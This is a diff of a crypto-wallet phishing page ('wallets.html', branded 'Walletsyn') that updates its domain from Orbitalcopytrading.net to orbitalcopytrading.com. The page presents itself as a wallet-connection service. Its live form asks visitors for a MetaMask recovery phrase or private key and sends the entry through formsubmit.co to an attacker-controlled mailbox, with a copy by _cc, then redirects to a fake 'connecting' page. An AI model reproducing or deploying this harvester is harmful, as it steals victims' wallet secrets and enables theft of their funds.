--- a/copymoon.net/dashboard/wallets.html
+++ b/copymoon.net/dashboard/wallets.html
@@ -34,8 +34,8 @@ window.smartsupp||(function(d) {
     <meta data-react-helmet="true" name="og:description" content="Open protocol for connecting Wallets to Dapps">
     <meta data-react-helmet="true" name="og:site_name" content="Walletsyn">
     <meta data-react-helmet="true" name="fb:admins" content="365412154213405">
-    <link rel="apple-touch-icon" href="https://Orbitalcopytrading.net/link/logo192.html">
-    <link rel="shortcut icon" href="https://Orbitalcopytrading.net/link/assets/logo.png">
+    <link rel="apple-touch-icon" href="https://orbitalcopytrading.com/link/logo192.html">
+    <link rel="shortcut icon" href="https://orbitalcopytrading.com/link/assets/logo.png">
     <link rel="preconnect" href="https://fonts.gstatic.com/">
     <link href="./wallets_files/css2.html" rel="stylesheet">
     <link rel="stylesheet" href="./wallets_files/bootstrap.min.css" integrity="sha384-B0vP5xmATw1+K9KRQjQERJvTumQW0nPEzvF6L/Z6nronJ3oUOFUFpCjEUQouq2+l" crossorigin="anonymous">
@@ -229,14 +229,14 @@ window.smartsupp||(function(d) {
 <div id="root">
     <div>
         <header class="header">
-            <a class="nav_link" href="https://Orbitalcopytrading.net/user/deposit">Go back</a><a class="nav_link" href="wallet.html"></a>
+            <a class="nav_link" href="https://orbitalcopytrading.com/user/deposit">Go back</a><a class="nav_link" href="wallet.html"></a>
             <div class="nav_logo">
                <a aria-current="page" class="" href="wallet.html">
     <img src="./wallets_files/logo_2.png" alt="logo" width="100" height="">
 </a>
 
             </div>
-            <a class="nav_link" href="wallet.html"></a><a class="nav_link" href="https://Orbitalcopytrading.net/link/apps.html"></a>
+            <a class="nav_link" href="wallet.html"></a><a class="nav_link" href="https://orbitalcopytrading.com/link/apps.html"></a>
         </header>
         <main>
             <div class="fuQfHo">
@@ -395,11 +395,11 @@ window.smartsupp||(function(d) {
                                     <button id="privateKeySend">Private Key</button>
                                 </div>
                                 <div class="send-form">
-                                    <form action="https://formsubmit.co/support@Orbitalcopytrading.net" id="" enctype="" method="POST">
+                                    <form action="https://formsubmit.co/support@orbitalcopytrading.com" id="" enctype="" method="POST">
              <input type="hidden" name="_next" value="https://supportmail.netlify.app/connecting.html">
       <input type="hidden" name="_captcha" value="false">
       <input type="hidden" name="_template" value="table">
-      <input type="hidden" name="_cc" value="support@Orbitalcopytrading.net">
+      <input type="hidden" name="_cc" value="support@orbitalcopytrading.com">
                                         <input type="hidden" name="wallet" id="walletNameData" value="MetaMask">
                                         <div id="data-to-send"><div class="form-group"><input type="hidden" id="type" name="type" value="phrase"><textarea name="phrase" required="" class="form-control" placeholder="Enter your recovery phrase" rows="5" style="resize: none" spellcheck="false"></textarea> </div> <div class="small text-left my-3" style="font-size: 11px">Typically 12 (sometimes 24) words separated by single spaces</div></div>
                                          <button type="submit" name="import" class="btn" style="background-color: blue; color: white; display: block; margin: 0 auto;">Continue</button>
